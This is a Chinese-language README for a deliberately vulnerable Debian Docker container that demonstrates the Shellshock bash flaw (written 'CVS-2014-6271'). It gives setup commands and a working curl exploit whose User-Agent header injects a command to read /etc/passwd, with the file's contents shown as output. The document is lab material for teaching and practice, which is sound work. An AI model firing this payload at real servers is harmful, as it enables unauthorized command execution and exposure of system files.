一个运行 Debian (Buster) Linux 的系统,带有易受攻击版本的 bash 和一个用于展示 CVS-2014-6271(又名 Shellshock)的 Web 应用程序。
该 Docker 容器基于 Debian Buster,并已被修改为使用存在漏洞的 Bash 版本 (bash_4.2:2b:dfsg-0.1)。
可通过 Apache 2 访问一个 Web 应用程序,它提供了一个运行 shell 命令的 CGI 脚本。
使用 docker pull hmlio/vaas-cve-2014-6271 安装容器。
使用端口映射 docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271 运行容器。
你应该可以通过 http://your-ip:8080/ 访问该 Web 应用程序。
该 Web 应用程序/存在漏洞的 bash 版本可按如下方式进行利用:
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
该概念和 Web 应用程序深受由 rasta_mouse 创建的 VulnHub 虚拟机 "Sokar" 的启发。 更多详情请参阅 https://www.vulnhub.com/entry/sokar-1,113/。